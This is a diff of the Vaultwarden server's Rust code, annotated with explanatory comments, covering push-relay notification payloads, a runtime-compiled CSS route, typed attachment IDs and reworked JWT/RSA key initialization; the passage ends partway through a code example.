     //Needed to register a device for push to bitwarden :
     let data = json!({
+        "deviceId": device.push_uuid, // Unique UUID per user/device
+        "pushToken": device.push_token,
         "userId": device.user_uuid,
-        "deviceId": device.push_uuid,
-        "identifier": device.uuid,
         "type": device.atype,
-        "pushToken": device.push_token
+        "identifier": device.uuid, // Unique UUID of the device/app, determined by the device/app it self currently registering
+        // "organizationIds:" [] // TODO: This is not yet implemented by Vaultwarden!
+        "installationId": CONFIG.push_installation_id(),
     });
 
-    let auth_push_token = get_auth_push_token().await?;
-    let auth_header = format!("Bearer {}", &auth_push_token);
+    let auth_api_token = get_auth_api_token().await?;
+    let auth_header = format!("Bearer {auth_api_token}");
 
-    if let Err(e) = get_reqwest_client()
-        .post(CONFIG.push_relay_uri() + "/push/register")
+    if let Err(e) = make_http_request(Method::POST, &(CONFIG.push_relay_uri() + "/push/register"))?
         .header(CONTENT_TYPE, "application/json")
         .header(ACCEPT, "application/json")
         .header(AUTHORIZATION, auth_header)
@@ -114,29 +120,31 @@ pub async fn register_push_device(device: &mut Device, conn: &mut crate::db::DbC
         .await?
         .error_for_status()
     {
-        err!(format!("An error occured while proceeding registration of a device: {e}"));
+        err!(format!("An error occurred while proceeding registration of a device: {e}"));
     }
 
     if let Err(e) = device.save(conn).await {
-        err!(format!("An error occured while trying to save the (registered) device push uuid: {e}"));
+        err!(format!("An error occurred while trying to save the (registered) device push uuid: {e}"));
     }
 
     Ok(())
 }
 
-pub async fn unregister_push_device(push_uuid: Option<String>) -> EmptyResult {
-    if !CONFIG.push_enabled() || push_uuid.is_none() {
+pub async fn unregister_push_device(push_id: &Option<PushId>) -> EmptyResult {
+    if !CONFIG.push_enabled() || push_id.is_none() {
         return Ok(());
     }
-    let auth_push_token = get_auth_push_token().await?;
+    let auth_api_token = get_auth_api_token().await?;
 
-    let auth_header = format!("Bearer {}", &auth_push_token);
+    let auth_header = format!("Bearer {auth_api_token}");
 
-    match get_reqwest_client()
-        .delete(CONFIG.push_relay_uri() + "/push/" + &push_uuid.unwrap())
-        .header(AUTHORIZATION, auth_header)
-        .send()
-        .await
+    match make_http_request(
+        Method::POST,
+        &format!("{}/push/delete/{}", CONFIG.push_relay_uri(), push_id.as_ref().unwrap()),
+    )?
+    .header(AUTHORIZATION, auth_header)
+    .send()
+    .await
     {
         Ok(r) => r,
         Err(e) => err!(format!("An error occurred during device unregistration: {e}")),
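`make_http_request` replaces direct `get_reqwest_client().post(...)` / `.delete(...)` calls at every push-relay call site. Judging only from those call sites, it returns a `Result<RequestBuilder>`, so an invalid or disallowed destination fails before any request is built. The signature below is inferred from usage, and the validation rule in it is purely illustrative, not the actual policy of Vaultwarden's `http_client` module:

    use reqwest::{Client, Method, RequestBuilder};

    // Hypothetical checked constructor matching the call sites above.
    fn make_http_request(method: Method, url: &str) -> Result<RequestBuilder, Box<dyn std::error::Error>> {
        let parsed = url::Url::parse(url)?; // reject unparseable URLs early
        if parsed.scheme() != "https" {
            return Err("only https destinations are allowed".into()); // illustrative policy only
        }
        static CLIENT: once_cell::sync::Lazy<Client> = once_cell::sync::Lazy::new(Client::new);
        Ok(CLIENT.request(method, parsed))
    }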
@@ -144,108 +152,110 @@ pub async fn unregister_push_device(push_uuid: Option<String>) -> EmptyResult {
     Ok(())
 }
 
-pub async fn push_cipher_update(
-    ut: UpdateType,
-    cipher: &Cipher,
-    acting_device_uuid: &String,
-    conn: &mut crate::db::DbConn,
-) {
+pub async fn push_cipher_update(ut: UpdateType, cipher: &Cipher, device: &Device, conn: &mut crate::db::DbConn) {
     // We shouldn't send a push notification on cipher update if the cipher belongs to an organization, this isn't implemented in the upstream server too.
     if cipher.organization_uuid.is_some() {
         return;
     };
-    let user_uuid = match &cipher.user_uuid {
-        Some(c) => c,
-        None => {
-            debug!("Cipher has no uuid");
-            return;
-        }
+    let Some(user_id) = &cipher.user_uuid else {
+        debug!("Cipher has no uuid");
+        return;
     };
 
-    if Device::check_user_has_push_device(user_uuid, conn).await {
+    if Device::check_user_has_push_device(user_id, conn).await {
         send_to_push_relay(json!({
-            "userId": user_uuid,
-            "organizationId": (),
-            "deviceId": acting_device_uuid,
-            "identifier": acting_device_uuid,
+            "userId": user_id,
+            "organizationId": null,
+            "deviceId": device.push_uuid, // Should be the records unique uuid of the acting device (unique uuid per user/device)
+            "identifier": device.uuid, // Should be the acting device id (aka uuid per device/app)
             "type": ut as i32,
             "payload": {
                 "id": cipher.uuid,
                 "userId": cipher.user_uuid,
-                "organizationId": (),
-                "revisionDate": cipher.updated_at
-            }
+                "organizationId": null,
+                "collectionIds": null,
+                "revisionDate": format_date(&cipher.updated_at)
+            },
+            "clientType": null,
+            "installationId": null
         }))
         .await;
     }
 }
 
-pub fn push_logout(user: &User, acting_device_uuid: Option<String>) {
-    let acting_device_uuid: Value = acting_device_uuid.map(|v| v.into()).unwrap_or_else(|| Value::Null);
+pub async fn push_logout(user: &User, acting_device_id: Option<DeviceId>, conn: &mut crate::db::DbConn) {
+    let acting_device_id: Value = acting_device_id.map(|v| v.to_string().into()).unwrap_or_else(|| Value::Null);
 
-    tokio::task::spawn(send_to_push_relay(json!({
-        "userId": user.uuid,
-        "organizationId": (),
-        "deviceId": acting_device_uuid,
-        "identifier": acting_device_uuid,
-        "type": UpdateType::LogOut as i32,
-        "payload": {
-            "userId": user.uuid,
-            "date": user.updated_at
-        }
-    })));
-}
-
-pub fn push_user_update(ut: UpdateType, user: &User) {
-    tokio::task::spawn(send_to_push_relay(json!({
-        "userId": user.uuid,
-        "organizationId": (),
-        "deviceId": (),
-        "identifier": (),
-        "type": ut as i32,
-        "payload": {
-            "userId": user.uuid,
-            "date": user.updated_at
-        }
-    })));
-}
-
-pub async fn push_folder_update(
-    ut: UpdateType,
-    folder: &Folder,
-    acting_device_uuid: &String,
-    conn: &mut crate::db::DbConn,
-) {
-    if Device::check_user_has_push_device(&folder.user_uuid, conn).await {
+    if Device::check_user_has_push_device(&user.uuid, conn).await {
         tokio::task::spawn(send_to_push_relay(json!({
-            "userId": folder.user_uuid,
+            "userId": user.uuid,
             "organizationId": (),
-            "deviceId": acting_device_uuid,
-            "identifier": acting_device_uuid,
-            "type": ut as i32,
+            "deviceId": acting_device_id,
+            "identifier": acting_device_id,
+            "type": UpdateType::LogOut as i32,
             "payload": {
-                "id": folder.uuid,
-                "userId": folder.user_uuid,
-                "revisionDate": folder.updated_at
-            }
+                "userId": user.uuid,
+                "date": format_date(&user.updated_at)
+            },
+            "clientType": null,
+            "installationId": null
         })));
     }
 }
 
-pub async fn push_send_update(ut: UpdateType, send: &Send, acting_device_uuid: &String, conn: &mut crate::db::DbConn) {
+pub async fn push_user_update(ut: UpdateType, user: &User, push_uuid: &Option<PushId>, conn: &mut crate::db::DbConn) {
+    if Device::check_user_has_push_device(&user.uuid, conn).await {
+        tokio::task::spawn(send_to_push_relay(json!({
+            "userId": user.uuid,
+            "organizationId": null,
+            "deviceId": push_uuid,
+            "identifier": null,
+            "type": ut as i32,
+            "payload": {
+                "userId": user.uuid,
+                "date": format_date(&user.updated_at)
+            },
+            "clientType": null,
+            "installationId": null
+        })));
+    }
+}
+
+pub async fn push_folder_update(ut: UpdateType, folder: &Folder, device: &Device, conn: &mut crate::db::DbConn) {
+    if Device::check_user_has_push_device(&folder.user_uuid, conn).await {
+        tokio::task::spawn(send_to_push_relay(json!({
+            "userId": folder.user_uuid,
+            "organizationId": null,
+            "deviceId": device.push_uuid, // Should be the records unique uuid of the acting device (unique uuid per user/device)
+            "identifier": device.uuid, // Should be the acting device id (aka uuid per device/app)
+            "type": ut as i32,
+            "payload": {
+                "id": folder.uuid,
+                "userId": folder.user_uuid,
+                "revisionDate": format_date(&folder.updated_at)
+            },
+            "clientType": null,
+            "installationId": null
+        })));
+    }
+}
+
+pub async fn push_send_update(ut: UpdateType, send: &Send, device: &Device, conn: &mut crate::db::DbConn) {
     if let Some(s) = &send.user_uuid {
         if Device::check_user_has_push_device(s, conn).await {
             tokio::task::spawn(send_to_push_relay(json!({
                 "userId": send.user_uuid,
-                "organizationId": (),
-                "deviceId": acting_device_uuid,
-                "identifier": acting_device_uuid,
+                "organizationId": null,
+                "deviceId": device.push_uuid, // Should be the records unique uuid of the acting device (unique uuid per user/device)
+                "identifier": device.uuid, // Should be the acting device id (aka uuid per device/app)
                 "type": ut as i32,
                 "payload": {
                     "id": send.uuid,
                     "userId": send.user_uuid,
-                    "revisionDate": send.revision_date
-                }
+                    "revisionDate": format_date(&send.revision_date)
+                },
+                "clientType": null,
+                "installationId": null
             })));
         }
     }
@@ -256,18 +266,25 @@ async fn send_to_push_relay(notification_data: Value) {
         return;
     }
 
-    let auth_push_token = match get_auth_push_token().await {
+    let auth_api_token = match get_auth_api_token().await {
         Ok(s) => s,
         Err(e) => {
-            debug!("Could not get the auth push token: {}", e);
+            debug!("Could not get the auth push token: {e}");
            return;
         }
     };
 
-    let auth_header = format!("Bearer {}", &auth_push_token);
+    let auth_header = format!("Bearer {auth_api_token}");
 
-    if let Err(e) = get_reqwest_client()
-        .post(CONFIG.push_relay_uri() + "/push/send")
+    let req = match make_http_request(Method::POST, &(CONFIG.push_relay_uri() + "/push/send")) {
+        Ok(r) => r,
+        Err(e) => {
+            error!("An error occurred while sending a send update to the push relay: {e}");
+            return;
+        }
+    };
+
+    if let Err(e) = req
         .header(ACCEPT, "application/json")
         .header(CONTENT_TYPE, "application/json")
         .header(AUTHORIZATION, &auth_header)
@@ -275,43 +292,47 @@ async fn send_to_push_relay(notification_data: Value) {
         .send()
         .await
     {
-        error!("An error occurred while sending a send update to the push relay: {}", e);
+        error!("An error occurred while sending a send update to the push relay: {e}");
     };
 }
 
-pub async fn push_auth_request(user_uuid: String, auth_request_uuid: String, conn: &mut crate::db::DbConn) {
-    if Device::check_user_has_push_device(user_uuid.as_str(), conn).await {
+pub async fn push_auth_request(user_id: &UserId, auth_request_id: &str, device: &Device, conn: &mut crate::db::DbConn) {
+    if Device::check_user_has_push_device(user_id, conn).await {
         tokio::task::spawn(send_to_push_relay(json!({
-            "userId": user_uuid,
-            "organizationId": (),
-            "deviceId": null,
-            "identifier": null,
+            "userId": user_id,
+            "organizationId": null,
+            "deviceId": device.push_uuid, // Should be the records unique uuid of the acting device (unique uuid per user/device)
+            "identifier": device.uuid, // Should be the acting device id (aka uuid per device/app)
             "type": UpdateType::AuthRequest as i32,
             "payload": {
-                "id": auth_request_uuid,
-                "userId": user_uuid,
-            }
+                "userId": user_id,
+                "id": auth_request_id,
+            },
+            "clientType": null,
+            "installationId": null
         })));
     }
 }
 
 pub async fn push_auth_response(
-    user_uuid: String,
-    auth_request_uuid: String,
-    approving_device_uuid: String,
+    user_id: &UserId,
+    auth_request_id: &AuthRequestId,
+    device: &Device,
     conn: &mut crate::db::DbConn,
 ) {
-    if Device::check_user_has_push_device(user_uuid.as_str(), conn).await {
+    if Device::check_user_has_push_device(user_id, conn).await {
         tokio::task::spawn(send_to_push_relay(json!({
-            "userId": user_uuid,
-            "organizationId": (),
-            "deviceId": approving_device_uuid,
-            "identifier": approving_device_uuid,
+            "userId": user_id,
+            "organizationId": null,
+            "deviceId": device.push_uuid, // Should be the records unique uuid of the acting device (unique uuid per user/device)
+            "identifier": device.uuid, // Should be the acting device id (aka uuid per device/app)
             "type": UpdateType::AuthRequestResponse as i32,
             "payload": {
-                "id": auth_request_uuid,
-                "userId": user_uuid,
-            }
+                "userId": user_id,
+                "id": auth_request_id,
+            },
+            "clientType": null,
+            "installationId": null
        })));
     }
 }
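One detail worth noting across these payload changes: inside `serde_json::json!`, the unit value `()` and the literal `null` both serialize to JSON null, so rewriting `"organizationId": ()` as `"organizationId": null` changes readability, not the wire format. The new `clientType` and `installationId` keys are genuine additions. A quick check:

    use serde_json::json;

    fn main() {
        // `()` and `null` are interchangeable inside json!
        let v = json!({ "a": (), "b": null });
        assert_eq!(v.to_string(), r#"{"a":null,"b":null}"#);
    }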
@@ -1,13 +1,20 @@
 use std::path::{Path, PathBuf};
 
-use rocket::{fs::NamedFile, http::ContentType, response::content::RawHtml as Html, serde::json::Json, Catcher, Route};
+use rocket::{
+    fs::NamedFile,
+    http::ContentType,
+    response::{content::RawCss as Css, content::RawHtml as Html, Redirect},
+    serde::json::Json,
+    Catcher, Route,
+};
 use serde_json::Value;
 
 use crate::{
     api::{core::now, ApiResult, EmptyResult},
     auth::decode_file_download,
+    db::models::{AttachmentId, CipherId},
     error::Error,
-    util::{Cached, SafeString},
+    util::Cached,
     CONFIG,
 };
 
@@ -16,7 +23,7 @@ pub fn routes() -> Vec<Route> {
     // crate::utils::LOGGED_ROUTES to make sure they appear in the log
     let mut routes = routes![attachments, alive, alive_head, static_files];
     if CONFIG.web_vault_enabled() {
-        routes.append(&mut routes![web_index, web_index_head, app_id, web_files]);
+        routes.append(&mut routes![web_index, web_index_direct, web_index_head, app_id, web_files, vaultwarden_css]);
     }
 
     #[cfg(debug_assertions)]
@@ -45,11 +52,66 @@ fn not_found() -> ApiResult<Html<String>> {
     Ok(Html(text))
 }
 
+#[get("/css/vaultwarden.css")]
+fn vaultwarden_css() -> Cached<Css<String>> {
+    let css_options = json!({
+        "signup_disabled": !CONFIG.signups_allowed() && CONFIG.signups_domains_whitelist().is_empty(),
+        "mail_enabled": CONFIG.mail_enabled(),
+        "mail_2fa_enabled": CONFIG._enable_email_2fa(),
+        "yubico_enabled": CONFIG._enable_yubico() && CONFIG.yubico_client_id().is_some() && CONFIG.yubico_secret_key().is_some(),
+        "emergency_access_allowed": CONFIG.emergency_access_allowed(),
+        "sends_allowed": CONFIG.sends_allowed(),
+        "load_user_scss": true,
+    });
+
+    let scss = match CONFIG.render_template("scss/vaultwarden.scss", &css_options) {
+        Ok(t) => t,
+        Err(e) => {
+            // Something went wrong loading the template. Use the fallback
+            warn!("Loading scss/vaultwarden.scss.hbs or scss/user.vaultwarden.scss.hbs failed. {e}");
+            CONFIG
+                .render_fallback_template("scss/vaultwarden.scss", &css_options)
+                .expect("Fallback scss/vaultwarden.scss.hbs to render")
+        }
+    };
+
+    let css = match grass_compiler::from_string(
+        scss,
+        &grass_compiler::Options::default().style(grass_compiler::OutputStyle::Compressed),
+    ) {
+        Ok(css) => css,
+        Err(e) => {
+            // Something went wrong compiling the scss. Use the fallback
+            warn!("Compiling the Vaultwarden SCSS styles failed. {e}");
+            let mut css_options = css_options;
+            css_options["load_user_scss"] = json!(false);
+            let scss = CONFIG
+                .render_fallback_template("scss/vaultwarden.scss", &css_options)
+                .expect("Fallback scss/vaultwarden.scss.hbs to render");
+            grass_compiler::from_string(
+                scss,
+                &grass_compiler::Options::default().style(grass_compiler::OutputStyle::Compressed),
+            )
+            .expect("SCSS to compile")
+        }
+    };
+
+    // Cache for one day should be enough and not too much
+    Cached::ttl(Css(css), 86_400, false)
+}
+
 #[get("/")]
 async fn web_index() -> Cached<Option<NamedFile>> {
     Cached::short(NamedFile::open(Path::new(&CONFIG.web_vault_folder()).join("index.html")).await.ok(), false)
 }
 
+// Make sure that `/index.html` redirect to actual domain path.
+// If not, this might cause issues with the web-vault
+#[get("/index.html")]
+fn web_index_direct() -> Redirect {
+    Redirect::to(format!("{}/", CONFIG.domain_path()))
+}
+
 #[head("/")]
 fn web_index_head() -> EmptyResult {
     // Add an explicit HEAD route to prevent uptime monitoring services from
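The new `vaultwarden_css` route renders an SCSS Handlebars template with feature flags and compiles it at request time, falling back to a bundled template if either step fails. The compile step on its own, using the same `grass_compiler` API the handler calls:

    fn main() {
        let scss = "$accent: #175ddc; .btn { color: $accent; }".to_string();
        let css = grass_compiler::from_string(
            scss,
            &grass_compiler::Options::default().style(grass_compiler::OutputStyle::Compressed),
        )
        .expect("SCSS should compile");
        println!("{css}"); // prints something like ".btn{color:#175ddc}"
    }

Note that `Cached::ttl(..., 86_400, false)` is HTTP-level caching (response headers), so clients re-fetch the stylesheet at most about once a day; the server itself still compiles on each uncached request.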
@@ -98,16 +160,16 @@ async fn web_files(p: PathBuf) -> Cached<Option<NamedFile>> {
     Cached::long(NamedFile::open(Path::new(&CONFIG.web_vault_folder()).join(p)).await.ok(), true)
 }
 
-#[get("/attachments/<uuid>/<file_id>?<token>")]
-async fn attachments(uuid: SafeString, file_id: SafeString, token: String) -> Option<NamedFile> {
+#[get("/attachments/<cipher_id>/<file_id>?<token>")]
+async fn attachments(cipher_id: CipherId, file_id: AttachmentId, token: String) -> Option<NamedFile> {
     let Ok(claims) = decode_file_download(&token) else {
         return None;
     };
-    if claims.sub != *uuid || claims.file_id != *file_id {
+    if claims.sub != cipher_id || claims.file_id != file_id {
         return None;
     }
 
-    NamedFile::open(Path::new(&CONFIG.attachments_folder()).join(uuid).join(file_id)).await.ok()
+    NamedFile::open(Path::new(&CONFIG.attachments_folder()).join(cipher_id.as_ref()).join(file_id.as_ref())).await.ok()
 }
 
 // We use DbConn here to let the alive healthcheck also verify the database connection.
@@ -170,7 +232,7 @@ pub fn static_files(filename: &str) -> Result<(ContentType, &'static [u8]), Erro
         }
         "bootstrap.css" => Ok((ContentType::CSS, include_bytes!("../static/scripts/bootstrap.css"))),
         "bootstrap.bundle.js" => Ok((ContentType::JavaScript, include_bytes!("../static/scripts/bootstrap.bundle.js"))),
-        "jdenticon.js" => Ok((ContentType::JavaScript, include_bytes!("../static/scripts/jdenticon.js"))),
+        "jdenticon-3.3.0.js" => Ok((ContentType::JavaScript, include_bytes!("../static/scripts/jdenticon-3.3.0.js"))),
         "datatables.js" => Ok((ContentType::JavaScript, include_bytes!("../static/scripts/datatables.js"))),
         "datatables.css" => Ok((ContentType::CSS, include_bytes!("../static/scripts/datatables.css"))),
         "jquery-3.7.1.slim.js" => {

src/auth.rs (467 lines changed)
@@ -1,18 +1,26 @@
 // JWT Handling
 //
-use chrono::{Duration, Utc};
+use chrono::{TimeDelta, Utc};
+use jsonwebtoken::{errors::ErrorKind, Algorithm, DecodingKey, EncodingKey, Header};
 use num_traits::FromPrimitive;
-use once_cell::sync::Lazy;
-use jsonwebtoken::{self, errors::ErrorKind, Algorithm, DecodingKey, EncodingKey, Header};
+use once_cell::sync::{Lazy, OnceCell};
+use openssl::rsa::Rsa;
 use serde::de::DeserializeOwned;
 use serde::ser::Serialize;
+use std::{env, net::IpAddr};
 
+use crate::{
+    config::PathType,
+    db::models::{
+        AttachmentId, CipherId, CollectionId, DeviceId, EmergencyAccessId, MembershipId, OrgApiKeyId, OrganizationId,
+        SendFileId, SendId, UserId,
+    },
+};
 use crate::{error::Error, CONFIG};
 
 const JWT_ALGORITHM: Algorithm = Algorithm::RS256;
 
-pub static DEFAULT_VALIDITY: Lazy<Duration> = Lazy::new(|| Duration::hours(2));
+pub static DEFAULT_VALIDITY: Lazy<TimeDelta> = Lazy::new(|| TimeDelta::try_hours(2).unwrap());
 static JWT_HEADER: Lazy<Header> = Lazy::new(|| Header::new(JWT_ALGORITHM));
 
 pub static JWT_LOGIN_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|login", CONFIG.domain_origin()));
@@ -25,24 +33,53 @@ static JWT_ADMIN_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|admin", CONFIG.
 static JWT_SEND_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|send", CONFIG.domain_origin()));
 static JWT_ORG_API_KEY_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|api.organization", CONFIG.domain_origin()));
 static JWT_FILE_DOWNLOAD_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|file_download", CONFIG.domain_origin()));
+static JWT_REGISTER_VERIFY_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|register_verify", CONFIG.domain_origin()));
 
-static PRIVATE_RSA_KEY: Lazy<EncodingKey> = Lazy::new(|| {
-    let key =
-        std::fs::read(CONFIG.private_rsa_key()).unwrap_or_else(|e| panic!("Error loading private RSA Key. \n{e}"));
-    EncodingKey::from_rsa_pem(&key).unwrap_or_else(|e| panic!("Error decoding private RSA Key.\n{e}"))
-});
-static PUBLIC_RSA_KEY: Lazy<DecodingKey> = Lazy::new(|| {
-    let key = std::fs::read(CONFIG.public_rsa_key()).unwrap_or_else(|e| panic!("Error loading public RSA Key. \n{e}"));
-    DecodingKey::from_rsa_pem(&key).unwrap_or_else(|e| panic!("Error decoding public RSA Key.\n{e}"))
-});
+static PRIVATE_RSA_KEY: OnceCell<EncodingKey> = OnceCell::new();
+static PUBLIC_RSA_KEY: OnceCell<DecodingKey> = OnceCell::new();
 
-pub fn load_keys() {
-    Lazy::force(&PRIVATE_RSA_KEY);
-    Lazy::force(&PUBLIC_RSA_KEY);
+pub async fn initialize_keys() -> Result<(), Error> {
+    use std::io::Error;
+
+    let rsa_key_filename = std::path::PathBuf::from(CONFIG.private_rsa_key())
+        .file_name()
+        .ok_or_else(|| Error::other("Private RSA key path missing filename"))?
+        .to_str()
+        .ok_or_else(|| Error::other("Private RSA key path filename is not valid UTF-8"))?
+        .to_string();
+
+    let operator = CONFIG.opendal_operator_for_path_type(PathType::RsaKey).map_err(Error::other)?;
+
+    let priv_key_buffer = match operator.read(&rsa_key_filename).await {
+        Ok(buffer) => Some(buffer),
+        Err(e) if e.kind() == opendal::ErrorKind::NotFound => None,
+        Err(e) => return Err(e.into()),
+    };
+
+    let (priv_key, priv_key_buffer) = if let Some(priv_key_buffer) = priv_key_buffer {
+        (Rsa::private_key_from_pem(priv_key_buffer.to_vec().as_slice())?, priv_key_buffer.to_vec())
+    } else {
+        let rsa_key = Rsa::generate(2048)?;
+        let priv_key_buffer = rsa_key.private_key_to_pem()?;
+        operator.write(&rsa_key_filename, priv_key_buffer.clone()).await?;
+        info!("Private key '{}' created correctly", CONFIG.private_rsa_key());
+        (rsa_key, priv_key_buffer)
+    };
+    let pub_key_buffer = priv_key.public_key_to_pem()?;
+
+    let enc = EncodingKey::from_rsa_pem(&priv_key_buffer)?;
+    let dec: DecodingKey = DecodingKey::from_rsa_pem(&pub_key_buffer)?;
+    if PRIVATE_RSA_KEY.set(enc).is_err() {
+        err!("PRIVATE_RSA_KEY must only be initialized once")
+    }
+    if PUBLIC_RSA_KEY.set(dec).is_err() {
+        err!("PUBLIC_RSA_KEY must only be initialized once")
+    }
+    Ok(())
 }
 
 pub fn encode_jwt<T: Serialize>(claims: &T) -> String {
-    match jsonwebtoken::encode(&JWT_HEADER, claims, &PRIVATE_RSA_KEY) {
+    match jsonwebtoken::encode(&JWT_HEADER, claims, PRIVATE_RSA_KEY.wait()) {
         Ok(token) => token,
         Err(e) => panic!("Error encoding jwt {e}"),
     }
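Replacing the two panicking `Lazy` statics with `OnceCell`s splits key handling into an explicit, fallible startup step (`initialize_keys`, which can now also generate a missing key and store it through the opendal operator) and blocking readers (`wait()`). A bad key file thus becomes a startup error instead of a panic at first JWT use. The pattern in miniature:

    use once_cell::sync::OnceCell;

    static KEY: OnceCell<String> = OnceCell::new();

    // Fallible, run-once initialization; errors surface at startup.
    fn initialize() -> Result<(), &'static str> {
        let key = "loaded-or-generated-key".to_string(); // stand-in for the RSA load/generate step
        KEY.set(key).map_err(|_| "KEY must only be initialized once")
    }

    // Readers block until initialize() has completed.
    fn use_key() -> &'static str {
        KEY.wait().as_str()
    }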
@@ -56,7 +93,7 @@ fn decode_jwt<T: DeserializeOwned>(token: &str, issuer: String) -> Result<T, Err
     validation.set_issuer(&[issuer]);
 
     let token = token.replace(char::is_whitespace, "");
-    match jsonwebtoken::decode(&token, &PUBLIC_RSA_KEY, &validation) {
+    match jsonwebtoken::decode(&token, PUBLIC_RSA_KEY.wait(), &validation) {
         Ok(d) => Ok(d.claims),
         Err(err) => match *err.kind() {
             ErrorKind::InvalidToken => err!("Token is invalid"),
@@ -103,6 +140,10 @@ pub fn decode_file_download(token: &str) -> Result<FileDownloadClaims, Error> {
     decode_jwt(token, JWT_FILE_DOWNLOAD_ISSUER.to_string())
 }
 
+pub fn decode_register_verify(token: &str) -> Result<RegisterVerifyClaims, Error> {
+    decode_jwt(token, JWT_REGISTER_VERIFY_ISSUER.to_string())
+}
+
 #[derive(Debug, Serialize, Deserialize)]
 pub struct LoginJwtClaims {
     // Not before
@@ -112,7 +153,7 @@ pub struct LoginJwtClaims {
     // Issuer
     pub iss: String,
     // Subject
-    pub sub: String,
+    pub sub: UserId,
 
     pub premium: bool,
     pub name: String,
@@ -133,7 +174,12 @@ pub struct LoginJwtClaims {
     // user security_stamp
     pub sstamp: String,
     // device uuid
-    pub device: String,
+    pub device: DeviceId,
+    // what kind of device, like FirefoxBrowser or Android derived from DeviceType
+    pub devicetype: String,
+    // the type of client_id, like web, cli, desktop, browser or mobile
+    pub client_id: String,
+
     // [ "api", "offline_access" ]
     pub scope: Vec<String>,
     // [ "Application" ]
@@ -149,31 +195,31 @@ pub struct InviteJwtClaims {
     // Issuer
     pub iss: String,
     // Subject
-    pub sub: String,
+    pub sub: UserId,
 
     pub email: String,
-    pub org_id: Option<String>,
-    pub user_org_id: Option<String>,
+    pub org_id: OrganizationId,
+    pub member_id: MembershipId,
     pub invited_by_email: Option<String>,
 }
 
 pub fn generate_invite_claims(
-    uuid: String,
+    user_id: UserId,
     email: String,
-    org_id: Option<String>,
-    user_org_id: Option<String>,
+    org_id: OrganizationId,
+    member_id: MembershipId,
     invited_by_email: Option<String>,
 ) -> InviteJwtClaims {
-    let time_now = Utc::now().naive_utc();
+    let time_now = Utc::now();
     let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
     InviteJwtClaims {
         nbf: time_now.timestamp(),
-        exp: (time_now + Duration::hours(expire_hours)).timestamp(),
+        exp: (time_now + TimeDelta::try_hours(expire_hours).unwrap()).timestamp(),
         iss: JWT_INVITE_ISSUER.to_string(),
-        sub: uuid,
+        sub: user_id,
         email,
         org_id,
-        user_org_id,
+        member_id,
         invited_by_email,
     }
 }
@@ -187,28 +233,28 @@ pub struct EmergencyAccessInviteJwtClaims {
     // Issuer
     pub iss: String,
     // Subject
-    pub sub: String,
+    pub sub: UserId,
 
     pub email: String,
-    pub emer_id: String,
+    pub emer_id: EmergencyAccessId,
     pub grantor_name: String,
     pub grantor_email: String,
 }
 
 pub fn generate_emergency_access_invite_claims(
-    uuid: String,
+    user_id: UserId,
     email: String,
-    emer_id: String,
+    emer_id: EmergencyAccessId,
     grantor_name: String,
     grantor_email: String,
 ) -> EmergencyAccessInviteJwtClaims {
-    let time_now = Utc::now().naive_utc();
+    let time_now = Utc::now();
     let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
     EmergencyAccessInviteJwtClaims {
         nbf: time_now.timestamp(),
-        exp: (time_now + Duration::hours(expire_hours)).timestamp(),
+        exp: (time_now + TimeDelta::try_hours(expire_hours).unwrap()).timestamp(),
         iss: JWT_EMERGENCY_ACCESS_INVITE_ISSUER.to_string(),
-        sub: uuid,
+        sub: user_id,
         email,
         emer_id,
         grantor_name,
@@ -225,20 +271,23 @@ pub struct OrgApiKeyLoginJwtClaims {
     // Issuer
     pub iss: String,
     // Subject
-    pub sub: String,
+    pub sub: OrgApiKeyId,
 
     pub client_id: String,
-    pub client_sub: String,
+    pub client_sub: OrganizationId,
     pub scope: Vec<String>,
 }
 
-pub fn generate_organization_api_key_login_claims(uuid: String, org_id: String) -> OrgApiKeyLoginJwtClaims {
-    let time_now = Utc::now().naive_utc();
+pub fn generate_organization_api_key_login_claims(
+    org_api_key_uuid: OrgApiKeyId,
+    org_id: OrganizationId,
+) -> OrgApiKeyLoginJwtClaims {
+    let time_now = Utc::now();
     OrgApiKeyLoginJwtClaims {
         nbf: time_now.timestamp(),
-        exp: (time_now + Duration::hours(1)).timestamp(),
+        exp: (time_now + TimeDelta::try_hours(1).unwrap()).timestamp(),
         iss: JWT_ORG_API_KEY_ISSUER.to_string(),
-        sub: uuid,
+        sub: org_api_key_uuid,
         client_id: format!("organization.{org_id}"),
         client_sub: org_id,
         scope: vec!["api.organization".into()],
@@ -254,22 +303,49 @@ pub struct FileDownloadClaims {
     // Issuer
     pub iss: String,
     // Subject
-    pub sub: String,
+    pub sub: CipherId,
 
-    pub file_id: String,
+    pub file_id: AttachmentId,
 }
 
-pub fn generate_file_download_claims(uuid: String, file_id: String) -> FileDownloadClaims {
-    let time_now = Utc::now().naive_utc();
+pub fn generate_file_download_claims(cipher_id: CipherId, file_id: AttachmentId) -> FileDownloadClaims {
+    let time_now = Utc::now();
     FileDownloadClaims {
         nbf: time_now.timestamp(),
-        exp: (time_now + Duration::minutes(5)).timestamp(),
+        exp: (time_now + TimeDelta::try_minutes(5).unwrap()).timestamp(),
         iss: JWT_FILE_DOWNLOAD_ISSUER.to_string(),
-        sub: uuid,
+        sub: cipher_id,
         file_id,
     }
 }
 
+#[derive(Debug, Serialize, Deserialize)]
+pub struct RegisterVerifyClaims {
+    // Not before
+    pub nbf: i64,
+    // Expiration time
+    pub exp: i64,
+    // Issuer
+    pub iss: String,
+    // Subject
+    pub sub: String,
+
+    pub name: Option<String>,
+    pub verified: bool,
+}
+
+pub fn generate_register_verify_claims(email: String, name: Option<String>, verified: bool) -> RegisterVerifyClaims {
+    let time_now = Utc::now();
+    RegisterVerifyClaims {
+        nbf: time_now.timestamp(),
+        exp: (time_now + TimeDelta::try_minutes(30).unwrap()).timestamp(),
+        iss: JWT_REGISTER_VERIFY_ISSUER.to_string(),
+        sub: email,
+        name,
+        verified,
+    }
+}
+
 #[derive(Debug, Serialize, Deserialize)]
 pub struct BasicJwtClaims {
     // Not before
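All of the claim generators switch from the `chrono::Duration` constructors, which panic on overflow, to `TimeDelta::try_*`, which return an `Option` instead (in current chrono, `TimeDelta` is simply the new name for `Duration`). They also move from `naive_utc()` to the timezone-aware `Utc::now()`, whose `timestamp()` yields the same Unix value. For example:

    use chrono::{TimeDelta, Utc};

    fn main() {
        let now = Utc::now();
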